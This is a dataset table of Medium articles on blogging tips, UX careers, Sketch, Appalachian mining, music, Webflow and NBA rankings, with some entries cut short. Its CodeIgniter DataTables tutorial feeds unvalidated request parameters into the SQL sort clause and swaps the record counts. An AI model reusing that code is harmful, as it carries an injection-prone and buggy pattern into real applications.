title stringlengths 1 200 ⌀ | text stringlengths 10 100k | url stringlengths 32 829 | authors stringlengths 2 392 | timestamp stringlengths 19 32 | tags stringlengths 6 263 |
|---|---|---|---|---|---|
How to Keep Your Blog Running While You’re Away — Socialbuzzhive.com | Hey, we all have to escape sometimes right? Whether during the Holidays or for a much needed vacation you can’t be tied to your blog 24/7 nor should you be. The reality though, is that blogging can be a totally time consuming process. Much more than people realize. Consistency is one of the most important factors to blogging success. Once your blog is established and especially if you outsource some help it gets a bit easier, but for newbie bloggers and website owners the thought of going away on holiday and leaving your baby blog unattended can put you in downright panic mode! But let’s face it, we all have holidays, events, family members, and other things to tend to. Life, after all should not be just about working, blogging, posting and constantly coming up with new content. Here’s how to keep your blog running smoothly even while you’re away.
Currently, I maintain approximately 4 blog posts per month. In the beginning I was churning out 4 a week!
This level of consistency is super important and helps maintain for me a steady level of traffic.
When you decide to have a blog, remember, it’s operating 24 hours a day, 7 days a week.
After all, your blog is your business and it should be treated as such.
So even though it’s producing passive income (and that’s the ultimate goal for you) it still needs tending to in many, many ways.
In this post, I will go over what you can do to ensure your blog stays fully functional and continues to produce tip top content for your readers along with income for you!:)
Let’s go!
Tip #1. Batch Your Content
Blogging requires laser focus and excellent planning.
Therefore, batching your content is the best way to ensure that your blog will have new fresh content for your readers.
You as a blogger are a master planner. Yes! Believe it!
Heck planning a well deserved trip or vacation on top of all that is just a walk in the park!
Once you’ve booked that trip or flight it’s time to start generating content for the duration of your trip so you ‘set it and forget it’!
Here’s an example — I dedicate my Tuesdays and Thursdays for actual writing so instead of producing 2 content posts per day. I would use those 2 days to produce a week’s worth of content.
Nowadays I’m so busy with other aspects of running my blog I sometimes outsource some content as well which frees up even more time!
Related Post 100 Reasons To Hire A Freelancer to Outsource Your Work
Tip #2. Use The WordPress Timestamp Feature
The WordPress Timestamp feature can save you a lot of time when it comes to creating and publishing your posts.
Lets say that you have a day where you are feeling super inspired about several topics, you are full of energy and you have some great ideas just spilling over that you’re dying to share!
You have written 3 or 4 posts, but you would like to spread them out because you are getting ready to go on vacation, or have that looming deadline for a project at work that you must complete.
Using the Timestamp feature will help you to spread your posts out over a few days and publish them for you.
Here’s how it works.
Take a post that you have written and are ready to publish, including proper tagging, images, etc. Go to the “Post Timestamp” on your post page and expand it. Select the “Edit timestamp” by clicking on it, there should now be a check mark in the box. Edit and select the date and time that you want your post published.
Now there is one important step left in editing your post for future publication.
You now need to click on the “Publish” button.
If you don’t do this and just click on “Save”, it will save your post as a draft and not publish it when you have specified.
This feature has saved me a ton of time and aggravation trying to write posts when I have an endless list of other things to do.
And as bloggers you know that list is endless!
More Articles of Interest 115 Sites That Pay You to Write and Blog 100 Creative Ways to Make Great Money On and Offline How To Create an Epic Social Media Strategy For Your New Website How to Market On Pinterest — The Ultimate Guide 6 Proven Ways to Monetize Your Blog
I don’t like to blog on my vacation or during the holidays because it defeats the whole purpose of a vacation and spending time with family and friends.
But I must be honest, I’m always surmising what I’m going to be writing about next and taking little notes as I go about the day…. and that’s okay.
As long as it’s not completely consuming you and taking you away from everything and those you’re closest to.
If you do find though that you realize you’ve made an error that you absolutely must fix, thanks to modern technology, as long as you have a laptop or a smart phone with internet, you’ll be able fix it from anywhere!
Some of my best blog posts have been written on the fly!
Sometimes the change of scenery is just what you need to get those creative juices flowing!
It also allows you to experience the laptop lifestyle experience.
You see, a blog is designed for you to share information, but let’s not forget one important element.
A blog is designed to help you and your readers connect and engage.
So why not share your vacation with your readers?
By sharing a bit of your personal life, it helps build your blog’s relationship with your readers.
Share your images, your meals, your adventures. Some amazing travel and food blogs were built this way.
Tip #4. Outsource For Writers
If you absolutely cannot write please make sure that you get someone hired to cover your writing for you.
Yes, it’s going to cost you some, but the price will be worth it to not lose your audience!
Always look at the bigger picture.
Sure it will cost you a some money to hire someone, but you can potentially lose thousands of readers if you don’t.
And after all the work you’ve put into your blog you don’t want that to happen!
Have some valuable content built up for sharing on topics that you’ve chosen that you know your readers will enjoy or find super helpful.
It’s not a bad idea to line up some guest posts for your blog.
Similar to outsourcing for writers, someone else will be doing the writing for you. The only difference between a guest post and outsourcing is the cost.
Guest posts are typically free.
Guest bloggers will write an article for you and in turn get a backlink which leads to traffic back to their own website. It’s a win win for both bloggers and something you want to incorporate even when you’re not on vacation!
Related Posts 2021’s Best Free Blogging Tools to Grow Your Blog Fast 6 Marketing Hacks You Need for the Holidays Now How to Start and Grow Your Business On YouTube
It’s your blog and you can do whatever you want with it.
Some obsess over every aspect of control over it and some are way more relaxed. I tend to be the former:/…but I’m still learning that I cannot have 100% control at all times!
I do recommend you ensure your blog stays operational even though you’re not available.
Unless you’re at the stage where your blog runs on auto pilot or you have a team of VA’s working with you to handle things it only makes sense.
It’s not so hard to do living in the digital age we’re in. And the best thing is you can do it from virtually anywhere!
Remember, life/work balance is very important too.
The last thing you want to get is blogger ‘burn-out’.
You can still manage to make time to enjoy that holiday or vacay and be a successful blogger! 🙂
If you found this article helpful please comment and like and share on social!
Get my 20 resources to grow your business and to turn your blog into a passive income machine today! | https://medium.com/@emilysocialbuzzhive/how-to-keep-your-blog-running-while-youre-away-socialbuzzhive-com-a43b4dd4fba2 | ['Emily Standley'] | 2021-03-09 18:02:06.347000+00:00 | ['Blogger', 'Onlinebusiness', 'Blogging', 'Blogtips', 'Bloggingtips'] |
What to consider when deciding on a UX education | What to consider when deciding on a UX education
How to find a course that works best for your priorities.
Photo by Yannis Papanastasopoulos on Unsplash
A few years ago when I discovered I wanted to work in user experience design, I spent months scouring bootcamp descriptions, online courses and masters programs. I had phone calls with recruiters, did all the free bootcamp tutorials and talked to lots of current UX designers and hiring managers. It was not a decision I took lightly and I didn’t have the money to take a risk since I was already struggling to find a career with a liveable income. Already ten years out of my undergrad, I needed to have the skills necessary to actually get a job and make enough to live on. I met successful designers who studied at bootcamps, masters programs and taught themselves and received mixed messages about everything. The consistent theme about courses was “it is what you make of it” and “you will have to do projects outside of what is assigned”. So with a racing heart, I committed my time and money to a masters degree. I knew I had to make it work.
Before I began my masters program I wrote my first Medium article describing my journey to this career change and since then I’ve had lots of aspiring user experience designers reach out to ask my advice. The most common question was how to decide between a masters program and a bootcamp so I wanted to share my thoughts on what you should consider before deciding on a user experience education.
Consider your priorities
Deciding on a program of learning or changing careers is a very personal choice and every individual’s situation will be different. Before you decide how you will study, consider your priorities. Often it is not just about learning a new skill, some people want a masters degree on their resume while some people want to start working in the field as quickly as possible, others want to make sure they feel confident before applying for roles (you probably won’t anyway), some people study so they can live in a particular location while others are happy learning from their couch. Here are a few factors you might want to consider.
Location
Where do you want to study? Where do you want to live after you study? Is this a place you can start building a network now? What are the job prospects in the area after you graduate?
2. Format
Will you find time to commit to a self motivated online course? Do you prefer intense learning or need time to take things in? Do you want a practical approach so you are ready for a job or a more academic approach that could lead to a PhD or further study?
3. Title
Do you want a recognized certification for your studies? Do you want the title of a masters degree? Do you just want to learn and get a job as quickly as possible?
4. Time
Are you starting as a complete beginner with no other design or technology experience? Or do you have a little experience that you can draw from already? Do you have other obligations in your future like a wedding or moving?
5. Cost
How much money can you commit to your education? Could you use the time spent on school learning on the job instead? (Sure, you never know if you can get a job until you have a portfolio and start looking.) How long will it take you to pay for the course once you get a UX job?
6. Career support
How much career support do you need? Do you already have a portfolio and resume or will you need to start from scratch?
So many factors affect the decision to go to school so if you are clear about your personal motivation it can help you get through difficult classes and times of ambiguity until you reach your goal. For me, having a really good course was important but I also wanted to live abroad, cost and time were a factor so one year was the longest I wanted to commit to. | https://uxdesign.cc/what-to-consider-when-deciding-on-a-ux-education-7270be341f4d | ['Amanda Conlon'] | 2020-12-31 12:00:58.368000+00:00 | ['Design Education', 'User Experience', 'UX Design', 'Ux Design Bootcamp', 'Changing Careers'] |
JQuery Datatable Server Side Processing Use Codeigniter and MySQL PHP. | How to get huge number of rows in jquery datatable from database using PHP, Codeigniter and MySQL ?
Let’s start for learn something new in jquery Datatable.
Normally we are used jquery datatable in our web projects, But we are faced loading issue when fetching large data from database. The pagination of jquery datatable is not work smoothly. For solve this problem we are used server side processing in jquery datatable. The server side datatable processing solve the loading issue when fetching millions of rows.
In this article we will learn how to fetch millions of rows from the database smoothly.
Now Start =>
Step 1 : We will use codeigniter 3 and jquery datatable CDN and bootstrap CDN.
Step 2 : Open the editor and open the project folder in the editor.
Step 3 : Create a database and configure it with your project in application/config/datatable.php
Step 4 : Now we will use the jQuery Datatable CDN in the view page. Paste the CSS link between the head tag of the page, and paste the JS link before the closing of html tag.
CDN download from : https://datatables.net/download/
Step 5: Now we will use the bootstrap CDN in our view page. Same as step 5 Paste the style link before the closing of the head tag and paste the javascript link before the closing of html tag.
CDN Download from: https://getbootstrap.com/docs/3.3/getting-started/
Bootstrap-theme.min.css use of this link is optional not compulsory.
Step 6: Will use the jquery in view page, link must be above the datatable link.
Step 7: Now create a html table in the view page with pagination and create static sample data.
Step 8: Call the datatable function.
$(document).ready(function() {
$('#example').DataTable();
} );
Step 10: Now create a controller and model for fetching the data from the database. Now i am using my sample datatable which has 1000 rows and 5 columns.
Step 11: Now implement the jquery AJAX datatable function for fetching of data from database using controller and model of codeigniter.
$(document).ready(function() {
tableLoad();
function tableLoad() {
var table = $('#example').DataTable(
{
"processing": true,
"serverSide": true,
"ajax": "<?=base_url('Welcome/getData')?>",
"order": [[2, 'desc']],
"columnDefs": [
{"targets": 0, "name": "id", 'searchable': true, 'orderable': true},
{"targets": 1, "name": "post_type", 'searchable': true, 'orderable': true},
{"targets": 2, "name": "caption", 'searchable': true, 'orderable': true},
{"targets": 3, "name": "img_1", 'searchable': true, 'orderable': true},
{"targets": 4, "name": "username", 'searchable': true, 'orderable': true},
]
});
}
} );
After using this code in the view page we need to set data in json format in controller method and the code set in controller method.
/**
* @method use to get data from get data method of welcome model
*/
public function getData() {
if(isset($_GET['search']['value'])){
$search = $_GET['search']['value'];
}
else{
$search = '';
}
if(isset($_GET['length'])){
$limit = $_GET['length'];
}
else{
$limit = 10;
}
if(isset($_GET['start'])){
$ofset = $_GET['start'];
}
else{
$ofset = 0;
}
$orderType = $_GET['order'][0]['dir'];
$nameOrder = $_GET['columns'][$_GET['order'][0]['column']]['name'];
$records = $this->Welcome_model->getData($limit , $search , $ofset , $nameOrder , $orderType);
$data = array();
$i=0+$ofset;
foreach ($records['data'] as $row)
{
if($row['status'] == 0){ $status = ' <span class="btn btn-danger btn-sm tgl_change_post danger" data-status="1" id="post_'.$row['user_id'].'" data-id="'.$row['user_id'].'">Inactive</span>';}
elseif($row['status'] == 1) { $status = '<span class="btn btn-success btn-sm tgl_change_post" data-status="0" data-id="'.$row['user_id'].'" id="post_'.$row['user_id'].'">Active</span>';}
// update_post_status('ci_ads' , $row['id']);
$data[]= array(
++$i,
$row['username'],
$row['first_name']. ' '. $row['last_name'],
$row['gender'],
$status,
);
}
$records['data']=$data;
echo json_encode($records);
}
In the controller we get the datatable variables in GET method like limit, order, search, offset with the values and now create a method in the model for fetching data from the database.
/**
* @method use for get data from data
*/
public function getData($limit , $search , $ofset , $nameorder , $orderType ) {
$query1 = $this->db->get('user_details');
$total = $query1->num_rows();
$query = $this->db->get('user_details');
$totalRecord = $query->result_array();
$filtered = $query->num_rows();
return array("recordsTotal"=>$filtered,"recordsFiltered"=>$total,'data' => $totalRecord);
}
Now we will get the result after these implements and the result is.
Step 12: Now we will work in our query for fetching the data according to need of the user like limit , search and order etc.
For Data in limit will use the limit in query :
public function getData($limit , $search , $ofset , $nameorder , $orderType ) {
$query1 = $this->db->get('user_details');
$total = $query1->num_rows();
$this->db->limit($limit , $ofset);
$query = $this->db->get('user_details');
$totalRecord = $query->result_array();
$filtered = $query->num_rows();
return array("recordsTotal"=>$filtered,"recordsFiltered"=>$total,'data' => $totalRecord);
}
Now table look like:
For Search use like method in query:
public function getData($limit , $search , $ofset , $nameorder , $orderType ) {
$query1 = $this->db->get('user_details');
$total = $query1->num_rows();
if(!empty($search))
$this->db->like('username' , $search);
$this->db->limit($limit , $ofset);
$query = $this->db->get('user_details');
$totalRecord = $query->result_array();
$filtered = $query->num_rows();
return array("recordsTotal"=>$filtered,"recordsFiltered"=>$total,'data' => $totalRecord);
}
Now Result Look like:
For order in ascending descending:
public function getData($limit , $search , $ofset , $ordername , $ordertype ) {
$query1 = $this->db->get('user_details');
$total = $query1->num_rows();
if(!empty($search))
$this->db->like('username' , $search);
$this->db->order_by($ordername , $ordertype);
$this->db->limit($limit , $ofset);
$query = $this->db->get('user_details');
$totalRecord = $query->result_array();
$filtered = $query->num_rows();
return array("recordsTotal"=>$filtered,"recordsFiltered"=>$total,'data' => $totalRecord);
}
Now data look like:
I hope you may learn how to use DataTable Processing from database in Codeigniter. Please share your thoughts in the comment section below.
For Example code you can clone from git hub
Follow Me on github | https://medium.com/@lovelesh-singh614/jquery-datatable-server-side-processing-use-codeigniter-and-mysql-php-de2df83ea15 | ['Lovelesh Singh'] | 2020-12-13 14:48:19.419000+00:00 | ['MySQL', 'Codeigniter', 'Datatables', 'Jqu', 'PHP'] |
UI Design: Design Practise in Sketch | The first hurdle I came across was the font style -probably the most notable difference you can see. The Guardian uses their own custom-designed font, Guardian Egyptian. For the purpose of this exercise I used Merriweather, as it was suggested online that this was a similar free alternative.
As you can see the difference is most apparent for the larger headlines, however less noticable in smaller sizes.
Although it was my first time using Sketch, I found it fairly intuitive to use as I have used Photoshop in the past, as well as other image editing apps. After completing the the clone of the first page, the rest could easily enough be completed by copying elements from the first page. The tutorial for this exercise also included a lot of shortcut commands, and once I got used to using them, it made the exercise go along much quicker.
Style Observations
The colour of article headlines depended on category e.g. Red and black for international news, or pink and purple for lifestyle articles.
of article headlines depended on e.g. Red and black for international news, or pink and purple for lifestyle articles. A sans font was used for live updates , eg. time related notifications, while the serif font Guardian Egyptian was used for everything else — i.e. published articles, headlines.
was used for , eg. time related notifications, while the Guardian Egyptian was used for — i.e. published articles, headlines. UI design patterns: article list, categorisation, navigation tabs, continuous scrolling, modal window, pull to refresh.
Takeaways | https://medium.com/@amanda.low/ironhack-prework-exercise-2-design-practise-35c725ca76cd | ['Amanda Low'] | 2019-12-16 17:37:37.781000+00:00 | ['UI', 'UX', 'Design', 'Typography', 'Sketch'] |
Misery in the Mountain State: The Catastrophic Impacts of Mountaintop Removal in Rural Appalachia | A mountaintop removal site in West Virginia. Source: earthjustice.org.
In Boone County, West Virginia, residents learn at a young age to avoid all contact with the tap water flowing from pipes in their homes. Ryan Hall-Massey, a seven-year-old boy, has had half of his teeth capped to replace enamel decimated from brushing his teeth with it. An 18-year-old neighbor fared even worse: he has only one tooth remaining. Ryan’s brother is covered with painful lesions on his arms, legs and chest from bathing in the water. In a span of 10 houses in his neighborhood, six people have had brain tumors. 30 percent of the area residents have had their gallbladders removed.
Boone County residents noticed changes in their water right about when nearby coal companies began to inject toxic slurry into abandoned underground mine shafts. When EPA tests found that their wells had arsenic, barium, lead, and manganese well over the healthy rates, nobody was surprised.
Boone County, West Virginia is not an isolated case. Rather, it is emblematic of an entire region — home to 25 million people — that has suffered at the hands of an oppressive fossil fuel industry that prioritizes short-term profits over long-term rights to existence.
Mountaintop removal (MTR) is a form of surface coal mining primarily used in the Appalachian mountains. The process of MTR involves clearcutting — and often burning — forests, and using explosives and heavy machinery to detonate hundreds of feet of rock from mountaintops, exposing coal layers that are inaccessible via other mining techniques.
“The problem is that for every about a meter of coal, you have about 99 meters of rock that you have to put somewhere during this process. And when you’re in a landscape like Appalachia, the place that most of that rock ends up being put is in river valleys,” said Duke biologist Emily Bernhardt, who co-authored a report about the devastating impact MTR can have on the health of rivers.
Standing atop a MTR site in southern West Virginia last October, an Appalachia native explained it to me as such: “If fracking and traditional mining are drawing blood or removing organs from a mountain, mountaintop removal is crushing its bones.”
For this reason, MTR — often called “strip mining on steroids” — is regarded as the most destructive form of coal mining.
More than 500 mountaintops have already been destroyed, more than one million acres of forest have been clearcut, and over a thousand miles of valley streams have been buried under tons of rubble, polluting drinking water and threatening the health and safety of the region’s inhabitants.
Once exposed to oxygen and rain, the newly uncovered rocks and soil begin to leach long-sequestered metals and chemicals. As a result, the water emerging from the base of these valleys is often contaminated by chemicals, which can spread to groundwater, the source of most household tap water. MTR operations began in the 1970s, but did not take off until the ’90s, ironically as a result of Clean Air Act amendments made to curtail acid rain. Because acid rain results in part from anthropogenic emissions of sulfur, in 1990, the EPA amended the Clean Air Act to limit sulfur emissions. One way to reduce acid rain is to use coal with a lower sulfur content. Coal buried deep in the Appalachian mountains is naturally lower in sulfur than that of Western coalfields, which made MTR an attractive alternative to mining.
Justified by research highlighting the adverse effects of air pollution, the Clean Air Act seeks to mitigate the health impacts of burning coal, but neglects to address the implications of mining it. In effect, by regulating coal production on a national level, the Clean Air Act exacerbated environmental injustice in the nation’s mining capital: central Appalachia.
A 2017 mountaintop removal explosion in West Virginia. Source: huffpost.com.
Economic Impacts
MTR perpetuates poverty and leads to mass migration out of Appalachian cities. Most central Appalachian towns have seen gradual population decline since the 1950s. Economic studies in West Virginia and Kentucky have shown that MTR costs the states more revenue than it produces. Compared to traditional mining, MTR is not only more expensive, but is highly mechanized and employs fewer people — heavy machines do most of the clear-cutting, excavating, loading, and bulldozing of rubble. Areas in Central Appalachia with the highest MTR rates also have the highest unemployment rates and lowest income levels in the region.
As former Senator Robert Byrd put it in 2009: “The Central Appalachian coal seams that remain to be mined are becoming thinner and more costly to mine. Mountaintop removal mining, a declining national demand for energy, rising mining costs and erratic spot market prices all add up to fewer jobs in the coal fields.”
Coal companies claim that MTR flattens space for future development, but only 3 percent of former mine sites have been developed. The major developments on MTR sites across Appalachia have been maximum-security federal prisons, which exposes inmates to all of MTR’s adverse health impacts, like air and water pollution. Federal prisons are not the sort of meaningful employment opportunities that will stimulate local economies and bring large swaths of Appalachia out of poverty.
MTR eliminates the potential for development based on ecotourism and sustainable forest products. The environmental degradation of MTR makes the land unattractive for future alternative economic development. One study found that, contrary to pro-MTR arguments, MTR did not positively contribute to employment in surrounding areas; in fact, MTR counties had lower income levels and higher unemployment rates than non-MTR regions.
“Blowing up mountains, deforesting large tracts of land, polluting streams, destroying roads from all the trucks going by, coating the landscape in dust, making people sick — what other employers are going to move into that area?” said Michael Hendryx, a Mountaintop Removal researcher at Indiana University. “If you aren’t lucky enough to have one of those jobs, you’ve probably got nothing, you’ve got maybe a part-time job at the Dollar Store. Because there aren’t other opportunities, the economic base has been destroyed.”
Contaminated water near an MTR site in Morgantown, West Virginia. Source: MountaineerNewsService.com.
Water contamination
Perhaps the most egregious impact of MTR on these montane communities is water contamination, which makes itself felt through an array of peculiar health impacts in neighboring communities. Post-MTR, toxic slurry has leached arsenic, chromium, mercury, and lead into groundwater, which has led to elevated rates of these chemicals in groundwater and in residents’ private wells.
Mountaintop removal “valley fills” are responsible for burying more than 2,000 miles of vital Appalachian headwater streams, and poisoning many more. In the words of U.S. District Judge Charles H. Haden II: “If there is any life form that cannot acclimate to life deep in a rubble pile, it is eliminated. No effect on related environmental values is more adverse than obliteration. Under a valley fill, the water quantity of the stream becomes zero. Because there is no stream, there is no water quality.”
Indeed, in large swaths of Eastern Kentucky and Southern West Virginia, the dearth of clean, safe drinking water is a regular fact of life. In West Virginia, a boil-water notice is posted whenever a system’s water quality is compromised by factors like chemical contamination, line breaks that lead to sediment build-up, or inadequate disinfection. Boil-water notices urge residents to boil water coming from their household pipes before using it, or avoid using it until further notice. From 2013 to 2018, West Virginia counties posted more than 7,000 boil-water notices, many of which lasted months, and even years. In O’Toole — a small town in the heart of coalfield country — residents were on a continuous boil-water notice for more than 17 years.
Residents of these communities recount bizarre experiences reminiscent of horror movies, such as Fanta orange-colored water flowing from sinks, children emerging from baths covered in bleeding sores, and sudden, inexplicable cases of incontinence.
For months on end, Appalachians are denied the comfort of showering and bathing in their homes; they collect rainwater in buckets; and must buy bottled water or drive to natural springs in search of potable water. As contamination takes its toll across the state, many counties fall short of federal water quality standards. One 2019 study found that more than 65 percent of West Virginia counties consistently rank among the top third in the nation for violations of the Safe Drinking Water Act, a federal law that protects the quality of drinking water. In some wells, manganese concentrations reached 4,063 parts per billion (the EPA recommends that manganese in drinking water not exceed 50 parts per billion).
A map depicting the correlation between lung cancer deaths and MTR mine sites in Appalachia. Source: appvoices.org.
Health impacts
The health impacts of MTR are well-documented. Over the last decade, more than two dozen peer-reviewed studies have found correlations between mountaintop removal coal mining and increased rates of cancer, heart and respiratory diseases, and other negative health outcomes. Research shows that MTR-related toxins found in water can jeopardize human health, even when the water is not directly consumed, but merely used for activities like bathing, brushing teeth, and washing clothes and dishes.
In 2016, the Obama Administration authorized a National Academy of Sciences study into the health effects of mountaintop removal mining, but the Trump administration cancelled the study without explanation in mid-2017. Despite a lack of federal funding for MTR research, university researchers have produced an abundance of robust studies demonstrating the deleterious effects of MTR.
One study — which examined nearly 2 million live birth records in central Appalachia over a period of 7 years — found that communities near MTR sites had higher rates of six out of seven types of birth defects, and residents in closer proximity to MTR sites saw higher rates of birth defects. Another concluded that, since the passage of the Clean Air Act, MTR regions have seen a disproportionate increase in mortality rates related to respiratory cancer, respiratory disease, and other respiratory illnesses.
In a particularly groundbreaking study from Michael Hendryx’s team at Indiana University, researchers found that ecological impairment of stream ecosystems is directly correlated with human cancer mortality rates in surrounding areas. | https://medium.com/the-climate-series/misery-in-the-mountain-state-the-impacts-of-mountaintop-removal-in-rural-appalachian-west-virginia-5796ada02896 | ['Allie Lowy'] | 2020-11-01 23:33:26.390000+00:00 | ['Mining', 'Environment', 'Fossil Fuels', 'Health', 'Environmental Justice'] |
Single Spotlight- Chris Shiflett’s “This Ol’ World” | What is it with artists from outside the country genre making better and more authentic country music than artists within the genre itself? On Chris Shiflett’s 2017 album West Coast Town, he proved he could write a classic Bakersfield country song. And not just one. But a whole album’s worth. Shiflett returns with “This Ol’ World,” the first follow-up to the excellent West Coast Town.
Shiflett has said his next album will be a little more guitar-driven, but if “This Ol’ World” is any indication, the album will still be firmly planted in some breezy, Bakersfield-esque country music.
The song opens with some subtle steel guitar covered by a nice mix of acoustic and electric guitar before the drums kick in. In fact, the strength of the production is felt right from the start. The pacing really allows the song’s urgency to be felt without drowning the listener, and the several solos that come later in the song (both steel and lead guitar) are boot-stompers and really fit the identity Chris Shiflett has cultivated with his solo career. And indeed, Shiflett’s sound has become something worthy of a modern-day Buck Owens or Waylon Jennings. It’s the way the steel guitar and lead guitar play off each other. The two instruments aren’t competing; rather they’re complementing each other- something that characterizes the music of the aforementioned legends.
While the production is strong, the lyrics may even be stronger. I have spoken before about the artist Chris Shiflett has become. He doesn’t come from a country background. So while he can write country-themed lyrics, his strengths reside in crafting rock-oriented lyrics set to country production. “This Ol’ World” isn’t a complicated song lyrically. But what sets it apart is Shiflett’s ability to say so much without resorting to grandiosity.
Shiflett’s point in “This Ol’ World” is straight-forward. “Has this ol’ world lost its god-damn mind?” Shiflett asks. “I hope you’re doing alright,” he continues. It’s a protest song, in a way. But in a larger sense it’s a commentary about the world at large. Rather than resort to typical political clichés, Shiflett combines a rocker’s sense of the world with a country artist’s want to hold to tight to his loved one.
Rock on, Chris! | https://medium.com/shore2shore-country/single-spotlight-chris-shifletts-this-ol-world-757ce5db8aa3 | ['Nathan Kanuch'] | 2019-03-12 01:40:52.226000+00:00 | ['Pop Culture', 'Music', 'Country Music', 'County', 'Rock'] |
Figuring out what I like to do as a UX Designer | Figuring out what I like to do as a UX Designer Sathish Kumar Follow Dec 26 · 3 min read
Photo by Christina Morillo from Pexels
Designing a website has been my new found love being a UX Designer for the last two years. The last two years I have spent my time working on multiple projects including designing mobile apps, web based products and websites.
Being a UX Designer working in a small design agency you don’t get to choose what kind of work you will do that too in the initial stages of your design career. You end up doing whatever that has been given to you. It is anyway a good thing to have a hand different kind of design challenges until you figure out which one you really like doing. Though I had interest in doing all the above mentioned I din’t quite feel good since I wasn’t building any of the final outputs that the users would use.
I always start up with some project, do the role of a designer and hand over the designs to developers to get things built as per the design and then It goes to the users that is always in a state that doesn’t look like the way how it was designed.
Be it a website or an app or a digital product you need to have some knowledge in programming / coding in order to develop your own designs so it takes final shape as how you wanted it to be.
Learning to code was so difficult for me as I did try once during the 2020 COVID lock down as I neither din’t major in any computer related degree nor took computer science group in my high school. Giving up learning to code I was looking for alternatives that could fulfill my desire to build on my own designs into a final output that goes to the users.
After several days of exploration I found this amazing tool which helps you to build website on your own without any coding needed. But you might ask ‘There are a lot of website builders out there, what’s new in this?’. Yes there are a lot of website builders like Wix, Wordpress, etc but having tried those I still dint feel like they could be designer friendly and help you bring out all your creative ideas into reality.
So this amazing too is called ‘Webflow’ an American based start up product which allows designers to create stunning websites without code.
Finally I found something that I could use to convert my designs & hand over them to clients without needing the help of a developer. You don’t need to know coding to build a website using Webflow but this tool might take some time to learn but you will eventually love the process.
I have built some websites while I was learning to use the tool and I am still learning on what other things that this tool could do. But at the end it eventually helped me fulfil my thirst of converting my designs to a usable end product without the help of developers.
Being a Designer in India, using Webflow could be a little challenging due to its high pricing compared to its Indian peers. Will talk more on if Webflow is the right tool for Indian designers on my upcoming posts. | https://medium.com/design-bootcamp/figuring-out-what-i-like-to-do-being-a-ux-designer-708ddfe5895 | ['Sathish Kumar'] | 2020-12-27 22:00:57.949000+00:00 | ['Product Design', 'UX', 'Career', 'Design', 'Webflow'] |
NBA Power Rankings - The Top 10 Teams Heading Into the 20–21 Season | 10. Dallas Mavericks
19–20 Record: 43–32 (7th in West)
Dallas picked up G/F Josh Richardson to replace Seth Curry, who left in free agency. Richardson will bring solid two-way play to Dallas, who struggled at times defensively last year. With Kristaps Porzingis healthy and Luka Doncic an MVP candidate, the Mavericks will look to make a deep run in the star-studded Western Conference.
9. Philadelphia 76ers
19–20 Record: 43–40 (6th in East)
Much has changed since the Sixers were swept by the Celtics in the first round of the 2020 NBA Playoffs. Former Houston Rockets GM Daryl Morey took over the franchise and respected head coach Doc Rivers was hired. Morey added Seth Curry and Danny Green to complement Ben Simmons on the perimeter. Dwight Howard will play alongside Joel Embiid down low. Morey replaced Al Horford with three point shooters, seemingly trying the same approach he did in Houston.
8. Portland Trail Blazers
19–20 Record: 35–39 (9th in West)
The Blazers had a strong free agency, adding F Robert Covington Jr., F Derrick Jones Jr., F/C Harry Giles, and C Enes Kanter while only losing F Trevor Ariza. The Blazers made their exceptional “Bubble” run last year without Ariza who opted out of the restart. Their trip to the playoffs was fueled by historic shooting from Dame and a steady supply of offense by Carmelo Anthony. With Dame and C.J McCollum returning once again as one of the best backcourts in the league, and with improved perimeter defense, the Blazers are suited to make another run in the West.
7. Boston Celtics
19–20 Record: 48–24 (3rd in East)
While the Celtics lost a steady scorer in Gordon Hayward, they also lost his absurd contract. Boston signed F/C Tristan Thompson and underrated G Jeff Teague. After Jayson Tatum signed a max extension, all eyes will be on him to carry the offensive load, with Jaylen Brown complementing. However, for Boston to be a true contender, G Kemba Walker will need to be a reliable third option, something that may difficult if his knee problems continue.
6. Denver Nuggets
19–20 Record: 46–27 (3rd in West)
Denver will look to build on a successful playoff run that ended in the conference finals. Not suited to pay the 6'8 forward, Jerami Grant departed the Mile High city for Detroit. Denver, led by the talented duo of Jamal Murray and Nikola Jokic has high expectations for 2021. Nuggets fans will also be excited about F Michael Porter Jr., who played his best professional basketball in the Bubble. Expect Denver to contend for a place in the 2021 NBA Finals.
5. Miami Heat
19–20 Record: 44–29 (5th in East)
While Miami fell short of completing their Cinderella story and winning their 4th NBA title, they certainly surpassed any expectations. They signed defensive stud Avery Bradley to compliment an already sound defensive lineup led by G Jimmy Butler and C Bam Adebayo, who signed a max extension this offseason. G Tyler Herro will be a key offensive piece again this season after an impressive showing in the Bubble. However, don’t be too bullish on the Heat as it will be hard for them to replicate such success in a rejuvenated and improved Eastern Conference.
4. Milwaukee Bucks
19–20 Record: 56–17 (1st in East)
Oh, Milwaukee. It seems as if every year we find ourselves back in the same spot- The Bucks steamroll through the regular season and then get prematurely bounced in the playoffs. Anyhow, coming into the season, the Bucks are no doubt one of the best clubs. Fans will be anxious to see how the team performs throughout the year after a failed trade attempt for F Bogdan Bogdanovic and no word on a contract extension for reigning MVP Giannis Antetokounmpo. No matter the regular season success in 2021, all eyes will be on Milwaukee come playoff time as the Bucks try to desperately shake their poor playoff form in hopes of convincing the Greek Freak to stay put.
3. Brooklyn Nets
19–20 Record: 35–37 (7th in East)
Yes, I have the Nets at 3. Brooklyn will have everyone’s attention as arguably the best player in the league, Kevin Durant makes his return to the hardwood after 18 months. It will also be the first time we see KD and Kyrie Irving playing together. The Steve Nash hire also adds another interesting dynamic to a team that will compete in thirteen nationally televised games, the third-most in the league. Everything looks good on paper but only time will tell how well the new-look Nets will work. When you have KD and Kyrie, complimented by a defensive anchor like Deandre Jordan, it can’t be that bad right? Nets come in at №3 heading into the season.
Nationally televised games per team, for the 20–21 season.
2. L.A Clippers
19–20 Record: 49–23 (2nd in West)
After a disastrous blown 3–1 lead to the Denver Nuggets in the WCF, it seems as if the Clippers are poised for another go. After extending Paul George, the Clips will be eager to make a deep playoff run in hopes of getting Kawhi Leonard on board long term. L.A added Serge Ibaka in replace of Montrezl Harrell in an effort to remain one of the deepest rosters in the league. New coach Tyronn Lue will look to sort out any remaining locker room and chemistry issues from the previous year. In theory, the Clippers should be in as good a position as any to win the title.
1. L.A Lakers
19–20 Record: 52–19 (1st in West), 2020 NBA Champions
